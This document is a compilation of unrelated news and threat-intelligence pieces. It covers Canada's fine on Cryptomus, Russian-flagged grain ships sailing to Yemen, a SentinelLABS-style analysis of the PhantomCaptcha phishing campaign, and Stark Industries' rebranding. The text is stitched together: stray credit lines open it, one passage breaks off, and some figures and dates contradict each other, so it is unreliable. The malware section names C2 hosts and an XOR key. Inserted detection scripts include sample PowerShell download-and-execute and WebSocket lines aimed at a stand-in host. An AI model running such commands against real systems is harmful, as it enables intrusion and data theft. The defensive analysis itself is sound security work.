Corps Azov of the National Guard of Ukraine, Mariupol Now, House with the Clock / Google Maps, TASS,
Satellite images are courtesy of Planet Labs, Maxar, Airbus and Google Earth, and tiles are hosted by
Mapbox.
Co-funded by the European Union. Views and opinions expressed are those of the author(s) only and do not
necessarily reflect those of the European Union or the European Health and Digital Executive Agency
(HADEA). Neither the European Union nor the granting authority can be held responsible for them.
Financial regulators in Canada this week levied $176 million in fines against Cryptomus, a digital payments platform that supports dozens of Russian cryptocurrency exchanges and websites hawking cybercrime services. The penalties for violating Canada’s anti money-laundering laws come ten months after KrebsOnSecurity noted that Cryptomus’s Vancouver street address was home to dozens of foreign currency dealers, money transfer businesses, and cryptocurrency exchanges — none of which were physically located there.
On October 16, the Financial Transactions and Reports Analysis Center of Canada (FINTRAC) imposed a $176,960,190 penalty on Xeltox Enterprises Ltd., more commonly known as the cryptocurrency payments platform Cryptomus.
FINTRAC found that Cryptomus failed to submit suspicious transaction reports in cases where there were reasonable grounds to suspect that they were related to the laundering of proceeds connected to trafficking in child sexual abuse material, fraud, ransomware payments and sanctions evasion.
“Given that numerous violations in this case were connected to trafficking in child sexual abuse material, fraud, ransomware payments and sanctions evasion, FINTRAC was compelled to take this unprecedented enforcement action,” said Sarah Paquet, director and CEO at the regulatory agency.
In December 2024, KrebsOnSecurity covered research by blockchain analyst and investigator Richard Sanders, who’d spent several months signing up for various cybercrime services, and then tracking where their customer funds go from there. The 122 services targeted in Sanders’s research all used Cryptomus, and included some of the more prominent businesses advertising on the cybercrime forums, such as:
- abuse-friendly or “bulletproof” hosting providers like anonvm[.]wtf, and PQHosting;
- sites selling aged email, financial, or social media accounts, such as verif[.]work and kopeechka[.]store;
- anonymity or “proxy” providers like crazyrdp[.]com and rdp[.]monster;
- anonymous SMS services, including anonsim[.]net and smsboss[.]pro.
Flymoney, one of dozens of cryptocurrency exchanges apparently nested at Cryptomus. The image from this website has been machine translated from Russian.
Sanders found at least 56 cryptocurrency exchanges were using Cryptomus to process transactions, including financial entities with names like casher[.]su, grumbot[.]com, flymoney[.]biz, obama[.]ru and swop[.]is.
“These platforms were built for Russian speakers, and they each advertised the ability to anonymously swap one form of cryptocurrency for another,” the December 2024 story noted. “They also allowed the exchange of cryptocurrency for cash in accounts at some of Russia’s largest banks — nearly all of which are currently sanctioned by the United States and other western nations.”
Reached for comment on FINTRAC’s action, Sanders told KrebsOnSecurity he was surprised it took them so long.
“I have no idea why they don’t just sanction them or prosecute them,” Sanders said. “I’m not let down with the fine amount but it’s also just going to be the cost of doing business to them.”
The $173 million fine is a significant sum for FINTRAC, which imposed 23 such penalties last year totaling less than $26 million. But Sanders says FINTRAC still has much work to do in pursuing other shadowy money service businesses (MSBs) that are registered in Canada but are likely money laundering fronts for entities based in Russia and Iran.
In an investigation published in July 2024, CTV National News and the Investigative Journalism Foundation (IJF) documented dozens of cases across Canada where multiple MSBs are incorporated at the same address, often without the knowledge or consent of the location’s actual occupant.
Their inquiry found that the street address for Cryptomus parent Xeltox Enterprises was listed as the home of at least 76 foreign currency dealers, eight MSBs, and six cryptocurrency exchanges. At that address is a three-story building that used to be a bank and now houses a massage therapy clinic and a co-working space. But the news outlets found none of the MSBs or currency dealers were paying for services at that co-working space.
The reporters also found another collection of 97 MSBs clustered at an address for a commercial office suite in Ontario, even though there was no evidence any of these companies had ever arranged for any business services at that address.
An investigation by Bellingcat has identified yet another Russian-flagged bulk carrier, Irtysh (IMO: 9664976), operating in defiance of Western sanctions by exporting grain from occupied Crimea to Houthi-controlled Yemen.
Following the same pattern of deceptive methods used by other vessels involved in what Ukraine describes as “grain theft,” Irtysh disabled its location tracking en route to and from the Port of Sevastopol. The vessel also made a mandatory stop in Djibouti for inspection by the United Nations Verification and Inspection Mechanism (UNVIM) for Yemen before sailing on to the Port of Saleef, Yemen.
The majority of UN member states have repeatedly voted against Russia’s invasion of Ukraine. UNVIM told Bellingcat: “As a UN mandated body UNVIM does not have the authority to block shipments based on unilateral national or regional sanctions.” They added: “The UNVIM mandate is limited to verifying compliance with the UN Security Council resolutions related to Yemen.”
However, experts have previously told Bellingcat that, even with the limitations of that remit, the fact that grain shipments from occupied Ukrainian territories pass through a UN inspection mechanism creates an awkward situation.
Bellingcat mapped Irtysh’s journey by combining Automated Identification System (AIS) data from Lloyd’s List Intelligence and satellite analysis. During the investigation, two additional vessels were also identified with their tracking systems disabled while loading grain in Sevastopol: Matros Pozynich (IMO: 9573816) and Zafar (IMO: 9720263).
All cargo vessels must be inspected in Djibouti before proceeding to Houthi-controlled ports. AIS data showed Irtysh anchored off Djibouti for six days.
Two days later, Matros Pozynich switched its AIS back on before sailing through the Bosphorus Strait, just as Irtysh had. With its hull sitting low in the water, the vessel was photographed passing through Turkish waters seemingly fully laden.
After calling at Djibouti, likely for inspection by UNVIM, AIS data shows the bulk carrier departing for Saleef, Yemen, on Oct. 8. At time of publication, Matros Pozynich remains in anchorage off the Port of Saleef, Yemen.
A third vessel, also previously implicated for smuggling grain, Zafar, was captured by satellite imagery with its AIS turned off at the Port of Sevastopol from Sept. 23.
At the time of publication, Zafar had not sailed to Yemen via Djibouti. Instead, it was anchored off the Port of Alexandria, Egypt – another known location for offloading grain from occupied Ukraine, according to OCCRP reporting.
“Grain Theft”
Ukraine has repeatedly tried to dissuade countries from purchasing shipments loaded with what it describes as stolen grain from occupied regions.
The Port of Sevastopol and the Avlita grain terminal remain under European, UK and US sanctions. While no UN sanctions specifically target the port, a majority of UN member states have passed resolutions condemning Russia’s invasion of Ukraine and its occupation of Crimea since 2024.
Both Irtysh and Matros Pozynich delivered grain to the Houthi-controlled Port of Saleef via Djibouti – the UNVIM inspection point for Yemen. After ten years of war, the UNHCR reports that tens of thousands of people in Yemen are living in famine-like conditions, with a further five million people experiencing food insecurity.
UNVIM confirmed to Bellingcat that the Irtysh was inspected “in line with UNVIM operational protocols” on Sept. 7 and cleared by the Saudi-led coalition Evacuation and Humanitarian Operations Cell (EHOC) – a body entirely separate from the UN – on Sept. 8.
Asked whether UNVIM was aware the vessel had picked up grain from a port under Western sanctions, the agency replied: “The UNVIM mandate is limited to verifying compliance with the UN Security Council resolutions related to Yemen. Unilateral national sanctions or measures beyond that scope are outside the UNVIM mandate.”
Neither the Russian government nor its foreign ministry responded to requests for comment.
Yörük Işık, Bridget Diakun, Peter Barth, Galen Reich, Claire Press and Merel Zoet contributed to this report.
SentinelLABS together with Digital Security Lab of Ukraine has uncovered a coordinated spearphishing campaign targeting individual members of the International Red Cross, Norwegian Refugee Council, UNICEF, and other NGOs involved in war relief efforts and Ukrainian regional government administration.
Threat actors used emails impersonating the Ukrainian President’s Office carrying weaponized PDFs, luring victims into executing malware via a ‘ClickFix’-style fake Cloudflare captcha page.
The final payload is a WebSocket RAT hosted on Russian-owned infrastructure that enables arbitrary remote command execution, data exfiltration, and potential deployment of additional malware.
Despite six months of preparation, the attackers’ infrastructure was only active for a single day, indicating sophisticated planning and strong commitment to operational security.
An additional infrastructure pivot revealed a mobile attack vector with fake applications aimed at collecting geolocation, contacts, media files and other data from compromised Android devices.
Background
Following intelligence shared by research partner Digital Security Lab of Ukraine, SentinelLABS conducted an investigation into a coordinated spearphishing campaign launched on October 8th, 2025, targeting organizations critical to Ukraine’s war relief efforts.
The campaign was initiated through emails that impersonated the Ukrainian President’s Office and contained a weaponized PDF attachment (SHA-256: e8d0943042e34a37ae8d79aeb4f9a2fa07b4a37955af2b0cc0e232b79c2e72f3) embedded with a malicious link.
PDF document page 1/8
Targeted organizations included the International Committee of the Red Cross (ICRC), United Nations Children’s Fund (UNICEF) Ukraine office, Norwegian Refugee Council, Council of Europe’s Register of Damage for Ukraine, and Ukrainian government administrations in the Donetsk, Dnipropetrovsk, Poltava, and Mikolaevsk regions.
The weaponized PDF was an 8-page document that appeared to be a legitimate governmental communique. VirusTotal submissions on October 8th showed the malicious file uploaded from multiple locations including Ukraine, India, Italy, and Slovakia, suggesting widespread targeting and potential victim interaction with the campaign.
PhantomCaptcha Attack Chain
The PhantomCaptcha campaign employed a sophisticated multi-stage attack chain designed to exploit user trust and bypass traditional security controls.
Opening the weaponized PDF and clicking on the embedded link directed the victim to zoomconference[.]app, a domain masquerading as a legitimate Zoom site but in reality hosting a VPS server located in Finland and owned by Russian provider KVMKA.
Our analysis showed that zoomconference[.]app, hosted on IP 193.233.23[.]81, stopped resolving on the same day the attack attempt took place, indicating a single day operation. However, we were able to retrieve the server response from a record captured on VirusTotal. The server response showed that any visitors to the site encountered a convincing fake Cloudflare DDoS protection gateway.
Initial view of a page from zoomconference[.]app
After loading, the fake Cloudflare page attempts to establish a WebSocket connection to the attackers’ server, passing a randomly generated client identifier, clientId, produced by an embedded JavaScript function generateRandomId(). A JavaScript comment before the function suggests the client identifier should be 32 characters long; however, the code utilizes only 2 characters for clientId.
The attack infrastructure supported two potential infection paths. If the WebSocket server responded with a matching identifier, the victim’s browser would redirect to a legitimate, password-protected Zoom meeting. This infection path likely enabled live social engineering calls with victims; however, activation of this path was not observed during our investigation.
The primary infection vector relied on a variation of a social engineering technique that has been widely deployed by a variety of threat actors since mid-2024. Dubbed ClickFix or Paste and Run, it involves convincing the target to execute commands either deliberately or surreptitiously copied to the user’s clipboard. The PhantomCaptcha variant of this technique works as follows.
After the fake “automatic” verification process, victims are presented with a simulated reCaptcha challenge displaying an “I’m not a robot” checkbox.
Simulated reCaptcha controls
Clicking the checkbox triggers a popup with instructions in Ukrainian, directing users to:
Click the “Copy token” button in the popup
Press Windows + R to open the Run dialog
Paste and execute the command
Custom reCaptcha popup in Ukrainian with “Copy token” button
The button runs a function copyToken() which contains a PowerShell commandlet designed to run invisibly.
The code downloads and executes the next stage PowerShell script from hxxps://zoomconference[.]app/cptch/${clientId}, where ${clientId} is the same ID as described above.
This social engineering technique is particularly effective because the malicious code is executed by the user themselves, evading endpoint security controls that focus solely on detecting malicious files.
Infection paths
Our analysis suggests this attack chain has overlaps with recently-reported activity attributed to COLDRIVER, a Russian FSB-linked threat cluster, by several industry peers [1, 2, 3]. We continue to investigate whether this attribution can be confidently extended to the PhantomCaptcha campaign.
Multi-Stage Payload Delivery
Although the malware distribution server at zoomconference[.]app was not available at the time of analysis, we managed to discover additional infrastructure and payloads from malware repositories by querying for files from URLs ending with /cptch.
Our analysis revealed that the PhantomCaptcha campaign aimed to deliver PowerShell malware in three stages.
Stage 1: Obfuscated Downloader
The initial payload (SHA-256: 3324550964ec376e74155665765b1492ae1e3bdeb35d57f18ad9aaca64d50a44) was a heavily obfuscated PowerShell script named cptch and exceeding 500KB in size. Despite its apparent complexity, the cptch script’s core functionality is simply to download and execute a second-stage payload from hxxps://bsnowcommunications[.]com/maintenance.
The cptch file is a heavily obfuscated PowerShell script
The entire inflated script can be reduced to a single line:
Using massive obfuscation to obscure simple functionality is likely designed to evade signature-based detection and complicate analysis efforts.
Stage 2: Fingerprinting and Encrypted Comms
The second-stage payload (SHA-256: 4bc8cf031b2e521f2b9292ffd1aefc08b9c00dab119f9ec9f65219a0fbf0f566) is named maintenance and performs system reconnaissance, collecting:
Computer name
Domain information
Username
Process ID
System UUID (hardware identifier)
This data was XOR-encrypted with the hardcoded key b3yTKRaP4RHKYQMf0gMd4fw1KNvBtv3l and sent to hxxps://bsnowcommunications[.]com/maintenance/<data> via HTTP GET requests.
Part of the maintenance script and the hardcoded XOR key used for encryption
The script also disabled PowerShell command history logging via Set-PSReadlineOption -HistorySaveStyle SaveNothing as a means of evading forensic analysis.
The server responded with an encrypted payload containing the third and final stage, which was decrypted and executed in memory.
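The stage-2 beacon described above can be recovered from proxy logs once the key is known. The following decoder is an added analysis example, not code from the SentinelLABS report; it assumes the XOR output is hex-encoded (URL-safe Base64 is offered as an alternative) and that the fingerprint fields are pipe-delimited, neither of which the report states, and the log lines and host c2.invalid are constructed.

```python
import base64
from typing import List, Optional
from urllib.parse import urlparse

# XOR key quoted in the report. The C2 host itself is not reproduced;
# fixtures below use the reserved name c2.invalid.
XOR_KEY = b"b3yTKRaP4RHKYQMf0gMd4fw1KNvBtv3l"

def xor_repeating(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """Repeating-key XOR. Applying it twice restores the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def encode_beacon(fingerprint: str, encoding: str = "hex") -> str:
    """Build the <data> path segment for a test fixture (assumed encoding)."""
    raw = xor_repeating(fingerprint.encode("utf-8"))
    return raw.hex() if encoding == "hex" else base64.urlsafe_b64encode(raw).decode()

def decode_beacon(url: str, encoding: str = "hex") -> Optional[str]:
    """Return the plaintext fingerprint if url matches /maintenance/<data>."""
    parts = urlparse(url).path.split("/")
    if len(parts) < 3 or parts[1] != "maintenance" or not parts[2]:
        return None
    try:
        raw = (bytes.fromhex(parts[2]) if encoding == "hex"
               else base64.urlsafe_b64decode(parts[2]))
        plain = xor_repeating(raw).decode("utf-8")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None
    # A wrong key or an unrelated path yields non-printable bytes; drop those.
    return plain if plain.isprintable() else None

def scan_proxy_log(lines: List[str]) -> List[str]:
    """Decode every stage-2 beacon found in 'METHOD URL' style log lines."""
    hits = []
    for line in lines:
        url = line.split()[-1]
        plain = decode_beacon(url)
        if plain is not None:
            hits.append(plain)
    return hits

# Constructed fixture. The field layout (name|domain|user|pid|uuid) is an
# assumption; the report lists the fields but not their delimiter.
SAMPLE_FINGERPRINT = ("WS-FIN-01|corp.example|j.doe|4212|"
                      "6F9619FF-8B86-D011-B42D-00C04FC964FF")
SAMPLE_PROXY_LOG = [
    "GET https://c2.invalid/maintenance/" + encode_beacon(SAMPLE_FINGERPRINT),
    "GET https://c2.invalid/maintenance",
    "GET https://c2.invalid/static/app.js",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print("stage-2 beacon:", hit)
```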
Stage 3: WebSocket-Based Remote Access Trojan
The final payload (SHA-256: 19bcf7ca3df4e54034b57ca924c9d9d178f4b0b8c2071a350e310dd645cd2b23) is a lightweight PowerShell backdoor that connects (and repeatedly reconnects) to a remote WebSocket server at wss://bsnowcommunications[.]com:80. It receives Base64-encoded JSON messages that contain one of:
cmd: a command that is decoded and executed with iex (Invoke-Expression) synchronously.
Executing a command with iex (Invoke-Expression)
psh: a PowerShell payload decoded and executed asynchronously using a PowerShell runspace delegate.
Executing a PowerShell payload from the server
After execution, the script collects output, the current working directory, the machine HWID (UUID via WMI), PID, and an IDC identifier from the server message, converts that to JSON, and sends it back over the WebSocket. It is designed to run in an infinite loop, with reconnect logic and basic error handling.
The WebSocket-based RAT is a remote command execution backdoor, effectively a remote shell that gives an operator arbitrary access to the host.
Infrastructure Analysis
PhantomCaptcha demonstrated a moderate level of operational security through its brief active window. The C2 domain zoomconference[.]app resolved to 193.233.23[.]81, a VPS server hosted by Russian provider KVMKA. SentinelLABS’ analysis revealed the infrastructure was active for only about 24 hours on October 8, 2025, with ports 443 and 80 closed by the time of our investigation.
By fingerprinting the cached server response, we were able to identify a further malicious IP address, 45.15.156[.]24, to which goodhillsenterprise[.]com resolves and which has previously been seen serving obfuscated PowerShell malware scripts [1, 2]. We assess, with medium confidence, that 45.15.156[.]24 is currently or has recently been under the control of the threat actors behind PhantomCaptcha.
The C2 domain bsnowcommunications[.]com is linked to IP 185.142.33[.]131. Unlike the public-facing lure domain, this backend C2 infrastructure remains active, indicating strong compartmentalization and the need to maintain certain infrastructure for already-compromised systems.
We also found that on October 9, 2025, the day after the initial attack, a domain with the name zoomconference[.]click was registered, potentially indicating plans for continued operations.
PhantomCaptcha 2025 Attack Timeline
March – According to the earliest related event (registration of goodhillsenterprise[.]com), the attackers started their operations on 2025-03-27.
July – A number of malicious PowerShell scripts and other malware samples were developed and tested on VirusTotal in July 2025.
September – SSL certificates from Let’s Encrypt for the related domains were issued on Sep 15 and Sep 25, 2025.
October – Internal timestamps from the lure PDF document date back to Aug 2025, but were updated on Oct 8, 2025. The email with the malicious attachment was also sent out on Oct 8, 2025. On the same day, the attack domain was shut down only to appear the following day (Oct 9, 2025) under a different top level domain.
Pivot to Additional Campaign
One interesting pivot from our infrastructure analysis revealed a link to a wider campaign making use of adult-oriented social and entertainment lures, with potential links to development originating in Russia or Belarus.
As noted earlier, the PhantomCaptcha Zoom-themed domains were hosted on 193.233.23[.]81. During our analysis, the same IP began hosting a new domain, princess-mens[.]click, which appeared similar in ownership and configuration. Collected HTTPS response data from zoomconference[.]click also began including content identical to that found on the new domain, indicating a direct overlap in ownership of both domains.
Domain timeline, focused on October and later, on 193.233.23[.]81
zoomconference[.]click HTTPS response data matching princess-mens[.]click
The princess-mens[.]click domain has been observed linked to an Android application called princess.apk, hosted at https://princess-mens[.]click/princess.apk. The domain’s content and the APK are themed around an adult entertainment venue in Lviv, Ukraine, called Princess Men’s Club. Similar APKs can be found in other themes as well, such as “Cloud Storage”.
App requesting device location
The application collects a variety of data to send to a hardcoded C2, which itself can be linked to additional infrastructure and samples. The samples use the HTTPS protocol and communicate over port 5000 to various server paths such as /check_update, /data, and /upload. For example:
https://[IP ADDRESS]:5000/check_update?version=[APP VERSION NUMBER]
The APK’s collectAndSendAllData() method is designed to gather a wide range of personal and device information. Based on the variable names in the code, the specific data being collected appears to be as follows.
Contacts data: phonebook entries (names, numbers, emails).
Call logs: incoming, outgoing, and missed calls.
Installed apps: list of all installed applications.
SIM numbers/data: SIM card information such as numbers, IMSI, or carrier details.
Device info: hardware model, OS version, manufacturer, and possibly device ID.
Network info: connected network type (Wi-Fi, mobile, etc).
Wi-Fi SSID: name of the currently connected Wi-Fi network.
Location data: GPS or last known location of the device.
Public IP address: external IP visible to the internet.
Gallery images: photos or image metadata stored on the device.
While these findings indicate a possible relation to the PhantomCaptcha campaign, we are currently tracking it as a separate cluster of activity and encourage the research community to further pursue this lead for additional insight. We provide indicators that may be fruitful to explore at the end of this post.
Security Implications
Legitimate services do not require pasting commands into the Windows Run dialog (Win+R) or similar interfaces. Hence, user awareness training on “Paste and Run” social engineering techniques can help prevent attacks using this infection vector. Similarly, unexpected communications from government offices can be independently verified through known channels.
From a technical perspective, PowerShell execution logging and monitoring provides visibility into commands using hidden window styles, execution policy bypasses, or attempts to disable command history logging. Additionally, network security teams can monitor for WebSocket connections to recently-registered or suspicious domains, particularly those mimicking legitimate services.
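The logging recommendations above can be turned into concrete checks over PowerShell Script Block Logging text. The script below is an added detection example, not code from the SentinelLABS report; the rules are heuristics derived from the behaviours this post describes, and the script-block samples are constructed (pointing at the reserved host c2.invalid), not captured from the campaign.

```python
import re
from typing import List

# Heuristics for the behaviours named in this report, meant to run over the
# text of Script Block Logging events (Microsoft-Windows-PowerShell/Operational,
# event ID 4104). PowerShell accepts abbreviated parameter names
# (-w, -win, -windowstyle), hence the -w[a-z]* / -e[a-z]* prefixes.
RULES = [
    ("hidden_window", r"-w[a-z]*\s+hidden"),
    ("exec_policy_bypass", r"-e[a-z]*\s+bypass"),
    ("history_disabled",
     r"set-psreadlineoption\s+-historysavestyle\s+savenothing"),
    ("download_and_iex",
     r"(?:downloadstring|invoke-webrequest|iwr|irm|invoke-restmethod)"
     r"[^\n]*\|\s*(?:iex|invoke-expression)\b"
     r"|(?:\biex\b|invoke-expression)[^\n]*(?:downloadstring|net\.webclient)"),
    ("websocket_client", r"clientwebsocket|\bwss?://"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]

def analyze_script_block(text: str) -> List[str]:
    """Return the names of all rules that fire on one script block."""
    return [name for name, rx in COMPILED if rx.search(text)]

def triage(blocks: List[str]) -> List[dict]:
    """Flag any block with a hit; the hidden-window plus download-cradle pair
    (the Paste and Run shape described in this post) is rated high."""
    out = []
    for i, block in enumerate(blocks):
        hits = analyze_script_block(block)
        high = {"hidden_window", "download_and_iex"} <= set(hits)
        out.append({"index": i, "hits": hits,
                    "severity": "high" if high else "medium" if hits else "none"})
    return out

# Constructed script-block text, not captured from the campaign; only the
# shapes named in the report are reproduced, and the last block is benign.
SAMPLE_BLOCKS = [
    "powershell -w hidden -ep bypass -c \"iex (New-Object Net.WebClient)"
    ".DownloadString('https://c2.invalid/cptch/ab')\"",
    "Set-PSReadlineOption -HistorySaveStyle SaveNothing",
    "$ws = New-Object System.Net.WebSockets.ClientWebSocket; "
    "$ws.ConnectAsync([Uri]'wss://c2.invalid:80', "
    "[Threading.CancellationToken]::None).Wait()",
    r"Get-ChildItem -Path C:\Temp | Where-Object { $_.Length -gt 1MB }",
]

if __name__ == "__main__":
    for row in triage(SAMPLE_BLOCKS):
        print(row)
```

The regexes are deliberately loose (abbreviated parameter names, either ordering of cradle and Invoke-Expression); tune them against your own baseline of legitimate administrative scripts before alerting on a single medium hit.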
We provide a comprehensive list of Indicators of Compromise below to support threat hunting and detection efforts.
Conclusion
The PhantomCaptcha campaign reflects a highly capable adversary, demonstrating extensive operational planning, compartmentalized infrastructure, and deliberate exposure control. The six-month period between initial infrastructure registration and attack execution, followed by the swift takedown of user-facing domains while maintaining backend command-and-control, underscores an operator well-versed in both offensive tradecraft and defensive detection evasion.
The targeting of organizations supporting Ukraine’s relief efforts also reveals an adversary seeking intelligence across humanitarian operations, reconstruction planning, and international coordination efforts.
SentinelLABS continues to monitor infrastructure associated with this threat actor and will provide updates as new information becomes available.
Acknowledgments
We would like to express our thanks to partners in the region, including Digital Security Lab of Ukraine for their invaluable collaboration on this case.
Organizations that believe they may have been targeted by threat actors involved in this campaign are invited to reach out to the SentinelLABS team via ThreatTips@sentinelone.com.
In May 2025, the European Union levied financial sanctions on the owners of Stark Industries Solutions Ltd., a bulletproof hosting provider that materialized two weeks before Russia invaded Ukraine and quickly became a top source of Kremlin-linked cyberattacks and disinformation campaigns. But new findings show those sanctions have done little to stop Stark from simply rebranding and transferring their assets to other corporate entities controlled by its original hosting providers.
Materializing just two weeks before Russia invaded Ukraine in 2022, Stark Industries Solutions became a frequent source of massive DDoS attacks, Russian-language proxy and VPN services, malware tied to Russia-backed hacking groups, and fake news. ISPs like Stark are called “bulletproof” providers when they cultivate a reputation for ignoring any abuse complaints or police inquiries about activity on their networks.
In May 2025, the European Union sanctioned one of Stark’s two main conduits to the larger Internet — Moldova-based PQ Hosting — as well as the company’s Moldovan owners Yuri and Ivan Neculiti. The EU Commission said the Neculiti brothers and PQ Hosting were linked to Russia’s hybrid warfare efforts.
But a new report from Recorded Future finds that just prior to the sanctions being announced, Stark rebranded to the[.]hosting, under control of the Dutch entity WorkTitans BV (AS209847) on June 24, 2025. The Neculiti brothers reportedly got a heads up roughly 12 days before the sanctions were announced, when Moldovan and EU media reported on the forthcoming inclusion of the Neculiti brothers in the sanctions package.
In response, the Neculiti brothers moved much of Stark’s considerable address space and other resources over to a new company in Moldova called PQ Hosting Plus S.R.L., an entity reportedly connected to the Neculiti brothers thanks to the re-use of a phone number from the original PQ Hosting.
“Although the majority of associated infrastructure remains attributable to Stark Industries, these changes likely reflect an attempt to obfuscate ownership and sustain hosting services under new legal and network entities,” Recorded Future observed.
Neither the Recorded Future report nor the May 2025 sanctions from the EU mentioned a second critical pillar of Stark’s network that KrebsOnSecurity identified in a May 2024 profile on the notorious bulletproof hoster: The Netherlands-based hosting provider MIRhosting.
MIRhosting is operated by 38-year old Andrey Nesterenko, whose personal website says he is an accomplished concert pianist who began performing publicly at a young age. DomainTools says mirhosting[.]com is registered to Mr. Nesterenko and to Innovation IT Solutions Corp, which lists addresses in London and in Nesterenko’s stated hometown of Nizhny Novgorod, Russia.
Image credit: correctiv.org.
According to the book Inside Cyber Warfare by Jeffrey Carr, Innovation IT Solutions Corp. was responsible for hosting StopGeorgia[.]ru, a hacktivist website for organizing cyberattacks against Georgia that appeared at the same time Russian forces invaded the former Soviet nation in 2008. That conflict was thought to be the first war ever fought in which a notable cyberattack and an actual military engagement happened simultaneously.
Mr. Nesterenko did not respond to requests for comment. In May 2024, Mr. Nesterenko said he couldn’t verify whether StopGeorgia was ever a customer because they didn’t keep records going back that far. But he maintained that Stark Industries Solutions was merely one client of many, and claimed MIRhosting had not received any actionable complaints about abuse on Stark.
However, it appears that MIRhosting is once again the new home of Stark Industries, and that MIRhosting employees are managing both the[.]hosting and WorkTitans — the primary beneficiaries of Stark’s assets.
A copy of the incorporation documents for WorkTitans BV obtained from the Dutch Chamber of Commerce shows WorkTitans also does business under the names Misfits Media and WT Hosting (considering Stark’s historical connection to Russian disinformation websites, “Misfits Media” is a bit on the nose).
An incorporation document for WorkTitans B.V. from the Netherlands Chamber of Commerce.
The incorporation document says the company was formed in 2019 by a y.zinad@worktitans.nl. That email address corresponds to a LinkedIn account for a Youssef Zinad, who says their personal websites are worktitans[.]nl and custom-solution[.]nl. The profile also links to a website (etripleasims dot nl) that LinkedIn currently blocks as malicious. All of these websites are or were hosted at MIRhosting.
Although Mr. Zinad’s LinkedIn profile does not mention any employment at MIRhosting, virtually all of his LinkedIn posts over the past year have been reposts of advertisements for MIRhosting’s services.
Mr. Zinad’s LinkedIn profile is full of posts for MIRhosting’s services.
A Google search for Youssef Zinad reveals multiple startup-tracking websites that list him as the founder of the[.]hosting, which censys.io finds is hosted by PQ Hosting Plus S.R.L.
The Dutch Chamber of Commerce document says WorkTitans’ sole shareholder is a company in Almere, Netherlands called Fezzy B.V. Who runs Fezzy? The phone number listed in a Google search for Fezzy B.V. — 31651079755 — also was used to register a Facebook profile for a Youssef Zinad from the same town, according to the breach tracking service Constella Intelligence.
In a series of email exchanges leading up to KrebsOnSecurity’s May 2024 deep dive on Stark, Mr. Nesterenko included Mr. Zinad in the message thread (youssef@mirhosting.com), referring to him as part of the company’s legal team. The Dutch website stagemarkt[.]nl lists Youssef Zinad as an official contact for MIRhosting’s offices in Almere. Mr. Zinad did not respond to requests for comment.
Given the above, it is difficult to argue with the Recorded Future report on Stark’s rebranding, which concluded that “the EU’s sanctioning of Stark Industries was largely ineffective, as affiliated infrastructure remained operational and services were rapidly re-established under new branding, with no significant or lasting disruption.”